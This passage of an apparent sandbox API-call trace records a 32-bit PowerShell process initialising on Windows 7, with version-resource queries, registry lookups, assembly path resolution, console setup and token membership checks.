lpFileInformation=0x25e798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0137.278] GetLastError () returned 0xcb [0137.278] SetErrorMode (uMode=0x1) returned 0x1 [0137.278] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x25e81c | out: lpdwHandle=0x25e81c) returned 0x94c [0137.279] GetLastError () returned 0x0 [0137.279] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a2a574 | out: lpData=0x2a2a574) returned 1 [0137.280] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e7e8, puLen=0x25e7e4 | out: lplpBuffer=0x25e7e8*=0x2a2a610, puLen=0x25e7e4) returned 1 [0137.280] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x2a2a6ec, puLen=0x25e760) returned 1 [0137.280] lstrlenW (lpString="Microsoft Corporation") returned 21 [0137.280] lstrcpyW (in: lpString1=0x2e48d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0137.280] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x2a2a740, puLen=0x25e760) returned 1 [0137.280] lstrlenW (lpString="System.Management.Automation") returned 28 [0137.280] lstrcpyW (in: lpString1=0x2e48d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0137.280] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x2a2a79c, puLen=0x25e760) returned 1 [0137.280] lstrlenW (lpString="6.1.7601.17514") returned 14 [0137.280] lstrcpyW (in: lpString1=0x2e48d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0137.280] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x2a2a7dc, puLen=0x25e760) returned 1 [0137.280] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0137.280] lstrcpyW (in: lpString1=0x2e48d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0137.280] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x2a2a844, puLen=0x25e760) returned 1 [0137.280] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0137.280] lstrcpyW (in: lpString1=0x2e48d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0137.280] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x2a2a8e0, puLen=0x25e760) returned 1 [0137.280] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0137.280] lstrcpyW (in: lpString1=0x2e48d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0137.280] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x2a2a944, puLen=0x25e760) returned 1 [0137.280] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0137.281] lstrcpyW (in: lpString1=0x2e48d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0137.281] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x2a2a9c0, puLen=0x25e760) returned 1 [0137.281] lstrlenW (lpString="6.1.7601.17514") returned 14 [0137.281] lstrcpyW (in: lpString1=0x2e48d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0137.281] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x2a2a668, puLen=0x25e760) returned 1 [0137.281] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0137.281] lstrcpyW (in: lpString1=0x2e48d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0137.281] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x0, puLen=0x25e760) returned 0 [0137.281] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x0, puLen=0x25e760) returned 0 [0137.281] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x25e764, puLen=0x25e760 | out: lplpBuffer=0x25e764*=0x0, puLen=0x25e760) returned 0 [0137.281] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e758, puLen=0x25e754 | out: lplpBuffer=0x25e758*=0x2a2a610, puLen=0x25e754) returned 1 [0137.281] VerLanguageNameW (in: wLang=0x0, szLang=0x2e48d0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0137.281] VerQueryValueW (in: pBlock=0x2a2a574, lpSubBlock="\\", lplpBuffer=0x25e76c, puLen=0x25e768 | out: lplpBuffer=0x25e76c*=0x2a2a59c, puLen=0x25e768) returned 1 [0137.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.287] GetLastError () returned 0xcb [0137.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.292] GetLastError () returned 0xcb [0137.295] lstrlenW (lpString="䅁") returned 1 [0137.298] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e730 | out: phkResult=0x25e730*=0x328) returned 0x0 [0137.299] RegOpenKeyExW (in: hKey=0x328, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e734 | out: phkResult=0x25e734*=0x32c) returned 0x0 [0137.299] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e768 | out: phkResult=0x25e768*=0x330) returned 0x0 [0137.300] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e7a8, lpData=0x0, lpcbData=0x25e7a4*=0x0 | out: lpType=0x25e7a8*=0x1, lpData=0x0, lpcbData=0x25e7a4*=0x56) returned 0x0 [0137.302] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e7a8, lpData=0x2e48d0, lpcbData=0x25e7a4*=0x56 | out: lpType=0x25e7a8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e7a4*=0x56) returned 0x0 [0137.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0137.305] GetLastError () returned 0x0 [0137.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0137.306] GetLastError () returned 0x0 [0137.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0137.312] GetLastError () returned 0x0 [0137.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.327] GetLastError () returned 0xcb [0137.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0137.682] GetLastError () returned 0x2 [0137.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0137.683] GetLastError () returned 0x2 [0137.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.818] GetLastError () returned 0xcb [0137.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.819] GetLastError () returned 0xcb [0137.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.841] GetLastError () returned 0xcb [0137.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.841] GetLastError () returned 0xcb [0137.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.841] GetLastError () returned 0xcb [0138.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0138.059] GetLastError () returned 0x0 [0138.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0138.059] GetLastError () returned 0x0 [0138.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.066] GetLastError () returned 0xcb [0138.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.068] GetLastError () returned 0xcb [0138.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.109] GetLastError () returned 0x7e [0138.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0138.109] GetLastError () returned 0x7e [0138.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0138.556] GetLastError () returned 0x2 [0138.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0138.556] GetLastError () returned 0x2 [0138.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0138.611] GetLastError () returned 0x57 [0138.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0138.611] GetLastError () returned 0x57 [0138.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0138.772] GetLastError () returned 0x2 [0138.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0138.772] GetLastError () returned 0x2 [0138.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0138.953] GetLastError () returned 0x2 [0138.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0138.953] GetLastError () returned 0x2 [0138.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.993] GetLastError () returned 0xcb [0138.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e338, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0138.994] GetLastError () returned 0xcb [0138.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0138.994] GetLastError () returned 0xcb [0138.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0138.994] GetLastError () returned 0xcb [0139.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.003] GetLastError () returned 0xcb [0139.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x25e27c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0139.060] GetLastError () returned 0x2 [0139.060] SetErrorMode (uMode=0x1) returned 0x1 [0139.060] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x25e724 | out: lpFileInformation=0x25e724*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0139.060] GetLastError () returned 0x2 [0139.060] SetErrorMode (uMode=0x1) returned 0x1 [0139.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e338, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.254] GetLastError () returned 0x0 [0139.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.255] GetLastError () returned 0x0 [0139.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0139.255] GetLastError () returned 0x0 [0139.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.258] GetLastError () returned 0xcb [0139.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.261] GetLastError () returned 0xcb [0139.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.261] GetLastError () returned 0xcb [0139.264] CoCreateGuid (in: pguid=0x25e804 | out: pguid=0x25e804*(Data1=0x1289640c, Data2=0x2e44, Data3=0x49bc, Data4=([0]=0xac, [1]=0x83, [2]=0x46, [3]=0x5a, [4]=0xbd, [5]=0x1, [6]=0x39, [7]=0x70))) returned 0x0 [0139.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.268] GetLastError () returned 0xcb [0139.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.270] GetLastError () returned 0xcb [0139.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.272] GetLastError () returned 0xcb [0139.279] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0139.279] GetLastError () returned 0x0 [0139.281] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x25e6e4 | out: lpConsoleScreenBufferInfo=0x25e6e4) returned 1 [0139.281] GetLastError () returned 0x0 [0139.285] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0139.285] GetLastError () returned 0x0 [0139.285] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x25e6e4 | out: lpConsoleScreenBufferInfo=0x25e6e4) returned 1 [0139.286] GetLastError () returned 0x0 [0139.286] GetVersionExW (in: lpVersionInformation=0x2e48e8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2e48e8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0139.286] GetLastError () returned 0x0 [0139.288] GetCurrentProcess () returned 0xffffffff [0139.288] GetLastError () returned 0x3f0 [0139.288] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x25e6f4 | out: TokenHandle=0x25e6f4*=0x34c) returned 1 [0139.288] GetLastError () returned 0x3f0 [0139.291] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25e74c | out: TokenInformation=0x0, ReturnLength=0x25e74c) returned 0 [0139.292] GetLastError () returned 0x7a [0139.292] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2fee38 [0139.292] GetLastError () returned 0x7a [0139.292] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x2fee38, TokenInformationLength=0x4, ReturnLength=0x25e74c | out: TokenInformation=0x2fee38, ReturnLength=0x25e74c) returned 1 [0139.292] GetLastError () returned 0x7a [0139.295] DuplicateTokenEx (in: hExistingToken=0x34c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x25e704 | out: phNewToken=0x25e704*=0x344) returned 1 [0139.295] GetLastError () returned 0x7f [0139.295] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25e74c | out: TokenInformation=0x0, ReturnLength=0x25e74c) returned 0 [0139.295] GetLastError () returned 0x7a [0139.295] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2fee18 [0139.295] GetLastError () returned 0x7a [0139.295] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x2fee18, TokenInformationLength=0x4, ReturnLength=0x25e74c | out: TokenInformation=0x2fee18, ReturnLength=0x25e74c) returned 1 [0139.295] GetLastError () returned 0x7a [0139.296] CheckTokenMembership (in: TokenHandle=0x344, SidToCheck=0x2aad3e8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, 